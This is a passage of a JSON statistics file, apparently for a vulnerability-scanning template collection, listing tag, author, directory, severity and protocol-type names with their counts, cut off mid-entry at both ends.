ame":"mailgun","count":1},{"name":"metinfo","count":1},{"name":"mysql","count":1},{"name":"majordomo2","count":1},{"name":"qvisdvr","count":1},{"name":"shoppable","count":1},{"name":"avtech","count":1},{"name":"argussurveillance","count":1},{"name":"mirai","count":1},{"name":"sangfor","count":1},{"name":"ioncube","count":1},{"name":"gitlist","count":1},{"name":"bingmaps","count":1},{"name":"ecom","count":1},{"name":"k8s","count":1},{"name":"webctrl","count":1},{"name":"tapestry","count":1},{"name":"krweb","count":1},{"name":"monitorix","count":1},{"name":"testrail","count":1},{"name":"nweb2fax","count":1},{"name":"netlify","count":1},{"name":"tcexam","count":1},{"name":"crm","count":1},{"name":"meraki","count":1},{"name":"xampp","count":1},{"name":"tinymce","count":1},{"name":"doh","count":1},{"name":"zcms","count":1},{"name":"wildfly","count":1},{"name":"trane","count":1},{"name":"frontpage","count":1},{"name":"addpac","count":1},{"name":"svnserve","count":1},{"name":"turbocrm","count":1},{"name":"eprints","count":1},{"name":"apos","count":1},{"name":"redcap","count":1},{"name":"sceditor","count":1},{"name":"logontracer","count":1},{"name":"mautic","count":1},{"name":"opm","count":1},{"name":"cherokee","count":1},{"name":"nsasg","count":1},{"name":"geocode","count":1},{"name":"tink","count":1},{"name":"nerdgraph","count":1},{"name":"rsyncd","count":1},{"name":"totaljs","count":1},{"name":"chinaunicom","count":1},{"name":"skycaiji","count":1},{"name":"servicenow","count":1},{"name":"sugarcrm","count":1},{"name":"gespage","count":1},{"name":"hortonworks","count":1},{"name":"monitorr","count":1},{"name":"achecker","count":1},{"name":"ns","count":1},{"name":"bookstack","count":1},{"name":"vercel","count":1},{"name":"proftpd","count":1},{"name":"interlib","count":1},{"name":"jenzabar","count":1},{"name":"karel","count":1},{"name":"codemeter","count":1},{"name":"tracer","count":1},{"name":"ntopng","count":1},{"name":"oidc","count":1},{"name":"shiro","count":1},{"name":"yealink","count":1},{"name":"instagram","count":1},{"name":"graph","count":1},{"name":"htmli","count":1},{"name":"twitter","count":1},{"name":"square","count":1},{"name":"b2evolution","count":1},{"name":"clockwatch","count":1},{"name":"ambari","count":1},{"name":"clickhouse","count":1},{"name":"kerbynet","count":1},{"name":"eg","count":1},{"name":"kafdrop","count":1},{"name":"dnn","count":1},{"name":"postmark","count":1},{"name":"vanguard","count":1},{"name":"trilithic","count":1},{"name":"miscrsoft","count":1},{"name":"rhymix","count":1},{"name":"cors","count":1},{"name":"owasp","count":1},{"name":"klog","count":1},{"name":"nuuo","count":1},{"name":"sidekiq","count":1},{"name":"urlscan","count":1},{"name":"rujjie","count":1},{"name":"pulsesecure","count":1},{"name":"pivotaltracker","count":1},{"name":"clusterengine","count":1},{"name":"sco","count":1},{"name":"xdcms","count":1},{"name":"emby","count":1},{"name":"kodi","count":1},{"name":"email","count":1},{"name":"burp","count":1},{"name":"vnc","count":1},{"name":"wondercms","count":1},{"name":"livezilla","count":1},{"name":"shopware","count":1},{"name":"jnoj","count":1},{"name":"seeddms","count":1},{"name":"visualstudio","count":1},{"name":"viewpoint","count":1},{"name":"springframework","count":1},{"name":"circontrorl","count":1},{"name":"novnc","count":1},{"name":"realteo","count":1},{"name":"shopizer","count":1},{"name":"fortigate","count":1},{"name":"iterable","count":1},{"name":"find","count":1},{"name":"timesheet","count":1},{"name":"craftcms","count":1},{"name":"gogs","count":1},{"name":"alertmanager","count":1},{"name":"alienvault","count":1},{"name":"gotmls","count":1},{"name":"securityspy","count":1},{"name":"servicedesk","count":1},{"name":"place","count":1},{"name":"europeana","count":1},{"name":"apigee","count":1},{"name":"zend","count":1},{"name":"fuelcms","count":1},{"name":"locations","count":1},{"name":"geolocation","count":1},{"name":"haproxy","count":1},{"name":"postgres","count":1},{"name":"node-red-dashboard","count":1},{"name":"starttls","count":1}],"authors":[{"name":"dhiyaneshdk","count":315},{"name":"daffainfo","count":308},{"name":"pikpikcu","count":281},{"name":"pdteam","count":209},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":77},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":62},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"zh","count":8},{"name":"emadshanab","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":8},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"johnk3r","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":5},{"name":"yanyun","count":5},{"name":"e_schultze_","count":4},{"name":"leovalcante","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"mavericknerd","count":3},{"name":"forgedhallpass","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"shifacyclewala","count":3},{"name":"sullo","count":3},{"name":"z3bd","count":3},{"name":"github.com/its0x08","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"fyoorer","count":3},{"name":"alifathi-h1","count":3},{"name":"andydoering","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"me9187","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"its0x08","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"nkxxkn","count":2},{"name":"whoever","count":2},{"name":"zomsop82","count":2},{"name":"hahwul","count":2},{"name":"r12w4n","count":2},{"name":"x1m_martijn","count":2},{"name":"sy3omda","count":2},{"name":"hetroublemakr","count":2},{"name":"joeldeleep","count":2},{"name":"parth","count":2},{"name":"0xsapra","count":2},{"name":"swissky","count":2},{"name":"ree4pwn","count":2},{"name":"lark-lab","count":2},{"name":"arcc","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"huowuzhao","count":2},{"name":"convisoappsec","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"moritz nentwig","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"w4cky_","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"alph4byt3","count":2},{"name":"vavkamil","count":2},{"name":"_0xf4n9x_","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"gal nagli","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"koti2","count":2},{"name":"0xelkomy","count":2},{"name":"0xsmiley","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"martincodes-de","count":2},{"name":"cocxanh","count":2},{"name":"pxmme1337","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"dahse89","count":2},{"name":"randomrobbie","count":2},{"name":"bernardofsr","count":2},{"name":"ehsahil","count":2},{"name":"davidmckennirey","count":2},{"name":"yavolo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xd0ff9","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"yuansec","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"juicypotato1","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"brabbit10","count":1},{"name":"igibanez","count":1},{"name":"adrianmf","count":1},{"name":"kareemse1im","count":1},{"name":"soyelmago","count":1},{"name":"hakluke","count":1},{"name":"@ofjaaah","count":1},{"name":"sickwell","count":1},{"name":"bolli95","count":1},{"name":"cookiehanhoan","count":1},{"name":"yashgoti","count":1},{"name":"yashanand155","count":1},{"name":"retr0","count":1},{"name":"nvn1729","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bad5ect0r","count":1},{"name":"@dwisiswant0","count":1},{"name":"elouhi","count":1},{"name":"alperenkesk","count":1},{"name":"c3l3si4n","count":1},{"name":"rojanrijal","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"husain","count":1},{"name":"chron0x","count":1},{"name":"undefl0w","count":1},{"name":"clarkvoss","count":1},{"name":"luskabol","count":1},{"name":"bjhulst","count":1},{"name":"berkdusunur","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"dawid-czarnecki","count":1},{"name":"pudsec","count":1},{"name":"akash.c","count":1},{"name":"oscarintherocks","count":1},{"name":"charanrayudu","count":1},{"name":"flag007","count":1},{"name":"b0rn2r00t","count":1},{"name":"ilovebinbash","count":1},{"name":"notsoevilweasel","count":1},{"name":"makyotox","count":1},{"name":"push4d","count":1},{"name":"luci","count":1},{"name":"nytr0gen","count":1},{"name":"co0nan","count":1},{"name":"0xteles","count":1},{"name":"droberson","count":1},{"name":"ooooooo_q","count":1},{"name":"majidmc2","count":1},{"name":"qlkwej","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"philippdelteil","count":1},{"name":"orpheus","count":1},{"name":"gboddin","count":1},{"name":"borna nematzadeh","count":1},{"name":"taielab","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"schniggie","count":1},{"name":"th3.d1p4k","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rotemreiss","count":1},{"name":"kre80r","count":1},{"name":"jeya seelan","count":1},{"name":"thevillagehacker","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"ahmetpergamum","count":1},{"name":"patralos","count":1},{"name":"_darrenmartyn","count":1},{"name":"andysvints","count":1},{"name":"sicksec","count":1},{"name":"jteles","count":1},{"name":"ringo","count":1},{"name":"j33n1k4","count":1},{"name":"d0rkerdevil","count":1},{"name":"zhenwarx","count":1},{"name":"ajaysenr","count":1},{"name":"udyz","count":1},{"name":"0xrod","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"manuelbua","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"nerrorsec","count":1},{"name":"52971","count":1},{"name":"lethargynavigator","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"blckraven","count":1},{"name":"mubassirpatel","count":1},{"name":"ldionmarcil","count":1},{"name":"thezakman","count":1},{"name":"kaizensecurity","count":1},{"name":"sshell","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"0h1in9e","count":1},{"name":"tirtha_mandal","count":1},{"name":"geraldino2","count":1},{"name":"pratik khalane","count":1},{"name":"un-fmunozs","count":1},{"name":"thebinitghimire","count":1},{"name":"aresx","count":1},{"name":"b4uh0lz","count":1},{"name":"absshax","count":1},{"name":"jiheon-dev","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"izn0u","count":1},{"name":"daviey","count":1},{"name":"deena","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"elder tao","count":1},{"name":"ipanda","count":1},{"name":"whynotke","count":1},{"name":"naglinagli","count":1},{"name":"harshinsecurity","count":1},{"name":"defr0ggy","count":1},{"name":"mhdsamx","count":1},{"name":"affix","count":1},{"name":"fmunozs","count":1},{"name":"noamrathaus","count":1},{"name":"shifacyclewla","count":1},{"name":"sbani","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"akshansh","count":1},{"name":"intx0x80","count":1},{"name":"mass0ma","count":1},{"name":"ohlinge","count":1},{"name":"vzamanillo","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"florianmaak","count":1},{"name":"jrolf","count":1},{"name":"willd96","count":1},{"name":"evolutionsec","count":1},{"name":"sec_hawk","count":1},{"name":"xstp","count":1},{"name":"imnightmaree","count":1},{"name":"rodnt","count":1},{"name":"kabirsuda","count":1},{"name":"omarkurt","count":1},{"name":"alex","count":1},{"name":"0xh7ml","count":1},{"name":"zandros0","count":1},{"name":"andirrahmani1","count":1},{"name":"elmahdi","count":1},{"name":"furkansenan","count":1},{"name":"retr02332","count":1},{"name":"infosecsanyam","count":1},{"name":"lark lab","count":1},{"name":"_harleo","count":1},{"name":"shreyapohekar","count":1},{"name":"b0yd","count":1},{"name":"x6263","count":1},{"name":"apt-mirror","count":1},{"name":"kurohost","count":1},{"name":"ahmed sherif","count":1},{"name":"0ut0fb4nd","count":1}],"directory":[{"name":"cves","count":864},{"name":"vulnerabilities","count":334},{"name":"exposed-panels","count":291},{"name":"technologies","count":211},{"name":"exposures","count":199},{"name":"misconfiguration","count":151},{"name":"token-spray","count":102},{"name":"takeovers","count":66},{"name":"default-logins","count":61},{"name":"file","count":57},{"name":"workflows","count":43},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":841},{"name":"high","count":663},{"name":"medium","count":498},{"name":"critical","count":305},{"name":"low","count":158}],"types":[{"name":"http","count":2345},{"name":"file","count":57},{"name":"network","count":46},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":862},{"name":"lfi","count":353},{"name":"panel","count":297},{"name":"xss","count":269},{"name":"wordpress","count":263},{"name":"exposure","count":253},{"name":"rce","count":222},{"name":"tech","count":205},{"name":"wp-plugin","count":181},{"name":"cve2021","count":169},{"name":"cve2020","count":167},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"token-spray","count":102},{"name":"cve2019","count":102},{"name":"config","count":100},{"name":"cve2018","count":94},{"name":"iot","count":81},{"name":"apache","count":76},{"name":"oast","count":75},{"name":"takeover","count":70},{"name":"default-login","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"cve2017","count":53},{"name":"unauth","count":51},{"name":"network","count":44},{"name":"ssrf","count":44},{"name":"","count":43},{"name":"sqli","count":42},{"name":"oracle","count":40},{"name":"cve2016","count":40},{"name":"redirect","count":38},{"name":"logs","count":35},{"name":"misconfig","count":32},{"name":"google","count":30},{"name":"cve2015","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"auth-bypass","count":27},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"generic","count":24},{"name":"misc","count":22},{"name":"disclosure","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"weblogic","count":16},{"name":"aws","count":15},{"name":"wp-theme","count":15},{"name":"php","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"deserialization","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"cve2013","count":11},{"name":"intrusive","count":11},{"name":"xxe","count":11},{"name":"magento","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"rails","count":9},{"name":"vmware","count":9},{"name":"ibm","count":9},{"name":"kubernetes","count":9},{"name":"fastjson","count":9},{"name":"gitlab","count":9},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"microsoft","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"netgear","count":7},{"name":"fileupload","count":7},{"name":"camera","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"solr","count":7},{"name":"django","count":7},{"name":"cms","count":7},{"name":"docker","count":6},{"name":"drupal","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"lucee","count":6},{"name":"sitecore","count":6},{"name":"prometheus","count":6},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"phpmyadmin","count":6},{"name":"rconfig","count":6},{"name":"windows","count":5},{"name":"gocd","count":5},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"go","count":5},{"name":"java","count":5},{"name":"iis","count":5},{"name":"thinkphp","count":5},{"name":"wso2","count":5},{"name":"dedecms","count":5},{"name":"jolokia","count":5},{"name":"grafana","count":5},{"name":"symfony","count":5},{"name":"printer","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"webserver","count":4},{"name":"samsung","count":4},{"name":"npm","count":4},{"name":"zimbra","count":4},{"name":"maps","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"buffalo","count":4},{"name":"symantec","count":4},{"name":"hongdian","count":4},{"name":"proxy","count":4},{"name":"enum","count":4},{"name":"bigip","count":4},{"name":"wcs","count":4},{"name":"git","count":4},{"name":"resin","count":4},{"name":"rfi","count":4},{"name":"slack","count":4},{"name":"amazon","count":4},{"name":"magmi","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"firebase","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"keycloak","count":4},{"name":"microstrategy","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"fatpipe","count":4},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"github","count":3},{"name":"terramaster","count":3},{"name":"openam","count":3},{"name":"ssh","count":3},{"name":"jeesns","count":3},{"name":"activemq","count":3},{"name":"nosqli","count":3},{"name":"sql","count":3},{"name":"node","count":3},{"name":"zhiyuan","count":3},{"name":"log","count":3},{"name":"jellyfin","count":3},{"name":"minio","count":3},{"name":"targa","count":3},{"name":"kevinlab","count":3},{"name":"linkerd","count":3},{"name":"azure","count":3},{"name":"hoteldruid","count":3},{"name":"mongodb","count":3},{"name":"lfr","count":3},{"name":"openssh","count":3},{"name":"telerik","count":3},{"name":"smtp","count":3},{"name":"httpd","count":3},{"name":"backdoor","count":3},{"name":"oa","count":3},{"name":"kibana","count":3},{"name":"fanruan","count":3},{"name":"fpd","count":3},{"name":"opensis","count":3},{"name":"cacti","count":3},{"name":"kafka","count":3},{"name":"exposures","count":3},{"name":"caucho","count":3},{"name":"search","count":3},{"name":"nexus","count":3},{"name":"cloud","count":3},{"name":"tikiwiki","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"injection","count":3},{"name":"cves","count":3},{"name":"itop","count":3},{"name":"sonicwall","count":3},{"name":"ofbiz","count":3},{"name":"lansweeper","count":3},{"name":"druid","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"movable","count":3},{"name":"cve2007","count":3},{"name":"lotus","count":2},{"name":"hashicorp","count":2},{"name":"icewarp","count":2},{"name":"service","count":2},{"name":"pega","count":2},{"name":"mida","count":2},{"name":"bypass","count":2},{"name":"akkadian","count":2},{"name":"storage","count":2},{"name":"chamilo","count":2},{"name":"adminer","count":2},{"name":"hasura","count":2},{"name":"status","count":2},{"name":"openvpn","count":2},{"name":"cve2005","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"favicon","count":2},{"name":"totemomail","count":2},{"name":"axis2","count":2},{"name":"jeedom","count":2},{"name":"igs","count":2},{"name":"heroku","count":2},{"name":"ilo","count":2},{"name":"netis","count":2},{"name":"text","count":2},{"name":"trixbox","count":2},{"name":"prestashop","count":2},{"name":"yapi","count":2},{"name":"places","count":2},{"name":"flir","count":2},{"name":"ecology","count":2},{"name":"hikvision","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"mailchimp","count":2},{"name":"ucmdb","count":2},{"name":"cache","count":2},{"name":"spark","count":2},{"name":"ec2","count":2},{"name":"bitly","count":2},{"name":"netsweeper","count":2},{"name":"upload","count":2},{"name":"glassfish","count":2},{"name":"natshell","count":2},{"name":"jboss","count":2},{"name":"zeroshell","count":2},{"name":"redis","count":2},{"name":"linux","count":2},{"name":"voipmonitor","count":2},{"name":"saltstack","count":2},{"name":"payara","count":2},{"name":"bruteforce","count":2},{"name":"aruba","count":2},{"name":"fortios","count":2},{"name":"rancher","count":2},{"name":"nextjs","count":2},{"name":"spring","count":2},{"name":"geowebserver","count":2},{"name":"horde","count":2},{"name":"dos","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"prtg","count":2},{"name":"yii","count":2},{"name":"qihang","count":2},{"name":"leak","count":2},{"name":"huawei","count":2},{"name":"emerge","count":2},{"name":"liferay","count":2},{"name":"mcafee","count":2},{"name":"aviatrix","count":2},{"name":"electron","count":2},{"name":"harbor","count":2},{"name":"getsimple","count":2},{"name":"akamai","count":2},{"name":"smb","count":2},{"name":"seeyon","count":2},{"name":"fortinet","count":2},{"name":"python","count":2},{"name":"webcam","count":2},{"name":"tidb","count":2},{"name":"jsf","count":2},{"name":"splunk","count":2},{"name":"ruby","count":2},{"name":"chyrp","count":2},{"name":"justwriting","count":2},{"name":"hjtcloud","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"axis","count":2},{"name":"vrealize","count":2},{"name":"avantfax","count":2},{"name":"rockmongo","count":2},{"name":"forcepoint","count":2},{"name":"chiyu","count":2},{"name":"backups","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"aspose","count":2},{"name":"rocketchat","count":2},{"name":"s3","count":2},{"name":"paloalto","count":2},{"name":"oauth","count":2},{"name":"rstudio","count":2},{"name":"plesk","count":2},{"name":"frp","count":2},{"name":"commax","count":2},{"name":"vcenter","count":2},{"name":"guacamole","count":2},{"name":"hostheader-injection","count":2},{"name":"grav","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"kong","count":2},{"name":"odoo","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"phpcollab","count":2},{"name":"couchdb","count":2},{"name":"ecoa","count":2},{"name":"embed","count":2},{"name":"wuzhicms","count":2},{"name":"linkedin","count":2},{"name":"idea","count":2},{"name":"openemr","count":2},{"name":"middleware","count":2},{"name":"nagios","count":2},{"name":"sonarqube","count":2},{"name":"phpstorm","count":2},{"name":"myfactory","count":2},{"name":"showdoc","count":2},{"name":"nextcloud","count":2},{"name":"bucket","count":2},{"name":"jetbrains","count":2},{"name":"tor","count":1},{"name":"upnp","count":1},{"name":"ruckus","count":1},{"name":"javascript","count":1},{"name":"syslog","count":1},{"name":"csod","count":1},{"name":"shiro","count":1},{"name":"cooperhewitt","count":1},{"name":"plone","count":1},{"name":"twitter","count":1},{"name":"circontrorl","count":1},{"name":"cerebro","count":1},{"name":"achecker","count":1},{"name":"jmx","count":1},{"name":"postgres","count":1},{"name":"arl","count":1},{"name":"lotuscms","count":1},{"name":"oneblog","count":1},{"name":"tinymce","count":1},{"name":"kerbynet","count":1},{"name":"websvn","count":1},{"name":"netmask","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"pcoip","count":1},{"name":"emby","count":1},{"name":"shoretel","count":1},{"name":"dwsync","count":1},{"name":"myvuehelp","count":1},{"name":"razor","count":1},{"name":"yealink","count":1},{"name":"roads","count":1},{"name":"varnish","count":1},{"name":"rmi","count":1},{"name":"octoprint","count":1},{"name":"hiboss","count":1},{"name":"redhat","count":1},{"name":"apigee","count":1},{"name":"tcexam","count":1},{"name":"phpunit","count":1},{"name":"opm","count":1},{"name":"phpfastcache","count":1},{"name":"webui","count":1},{"name":"nownodes","count":1},{"name":"sourcebans","count":1},{"name":"xunchi","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"yachtcontrol","count":1},{"name":"openerp","count":1},{"name":"chevereto","count":1},{"name":"mantis","count":1},{"name":"centos","count":1},{"name":"lokalise","count":1},{"name":"tugboat","count":1},{"name":"square","count":1},{"name":"clave","count":1},{"name":"woocommerce","count":1},{"name":"commscope","count":1},{"name":"dribbble","count":1},{"name":"parentlink","count":1},{"name":"sugarcrm","count":1},{"name":"terraform","count":1},{"name":"episerver","count":1},{"name":"krweb","count":1},{"name":"circle","count":1},{"name":"shopxo","count":1},{"name":"livezilla","count":1},{"name":"proftpd","count":1},{"name":"zookeeper","count":1},{"name":"plc","count":1},{"name":"particle","count":1},{"name":"portainer","count":1},{"name":"placeos","count":1},{"name":"tinypng","count":1},{"name":"redmine","count":1},{"name":"office365","count":1},{"name":"adiscon","count":1},{"name":"dnssec","count":1},{"name":"tieline","count":1},{"name":"timeclock","count":1},{"name":"bingmaps","count":1},{"name":"calendarix","count":1},{"name":"fortiweb","count":1},{"name":"vsphere","count":1},{"name":"webftp","count":1},{"name":"floc","count":1},{"name":"karel","count":1},{"name":"owasp","count":1},{"name":"cofax","count":1},{"name":"ricoh","count":1},{"name":"kafdrop","count":1},{"name":"sceditor","count":1},{"name":"owa","count":1},{"name":"geolocation","count":1},{"name":"circleci","count":1},{"name":"gotmls","count":1},{"name":"totaljs","count":1},{"name":"twitter-server","count":1},{"name":"fortigates","count":1},{"name":"wavemaker","count":1},{"name":"natemail","count":1},{"name":"memcached","count":1},{"name":"k8","count":1},{"name":"kodi","count":1},{"name":"openrestry","count":1},{"name":"actuator","count":1},{"name":"jnoj","count":1},{"name":"ambari","count":1},{"name":"asus","count":1},{"name":"faraday","count":1},{"name":"digitalocean","count":1},{"name":"shoppable","count":1},{"name":"crm","count":1},{"name":"pivotaltracker","count":1},{"name":"realteo","count":1},{"name":"optiLink","count":1},{"name":"streetview","count":1},{"name":"webmin","count":1},{"name":"pendo","count":1},{"name":"imap","count":1},{"name":"sage","count":1},{"name":"sarg","count":1},{"name":"zcms","count":1},{"name":"tapestry","count":1},{"name":"lanproxy","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"timezone","count":1},{"name":"luftguitar","count":1},{"name":"miscrsoft","count":1},{"name":"tpshop","count":1},{"name":"paypal","count":1},{"name":"yzmcms","count":1},{"name":"mautic","count":1},{"name":"centreon","count":1},{"name":"craftcms","count":1},{"name":"doh","count":1},{"name":"micro-user-service","count":1},{"name":"clockwatch","count":1},{"name":"duomicms","count":1},{"name":"bolt","count":1},{"name":"details","count":1},{"name":"redwood","count":1},{"name":"gstorage","count":1},{"name":"spidercontrol","count":1},{"name":"emc","count":1},{"name":"manager","count":1},{"name":"fiori","count":1},{"name":"cse","count":1},{"name":"gridx","count":1},{"name":"octobercms","count":1},{"name":"mapbox","count":1},{"name":"xmlchart","count":1},{"name":"okta","count":1},{"name":"intercom","count":1},{"name":"jfrog","count":1},{"name":"fedora","count":1},{"name":"europeana","count":1},{"name":"deviantart","count":1},{"name":"xiuno","count":1},{"name":"frontpage","count":1},{"name":"viewpoint","count":1},{"name":"alibaba","count":1},{"name":"meraki","count":1},{"name":"webmodule-ee","count":1},{"name":"eprints","count":1},{"name":"dahua","count":1},{"name":"newrelic","count":1},{"name":"wildfly","count":1},{"name":"primetek","count":1},{"name":"ioncube","count":1},{"name":"darkstat","count":1},{"name":"geocode","count":1},{"name":"trane","count":1},{"name":"codeigniter","count":1},{"name":"froxlor","count":1},{"name":"spip","count":1},{"name":"dotnetnuke","count":1},{"name":"exponentcms","count":1},{"name":"mkdocs","count":1},{"name":"visualtools","count":1},{"name":"dvr","count":1},{"name":"svn","count":1},{"name":"ssltls","count":1},{"name":"mara","count":1},{"name":"minimouse","count":1},{"name":"fastcgi","count":1},{"name":"seacms","count":1},{"name":" 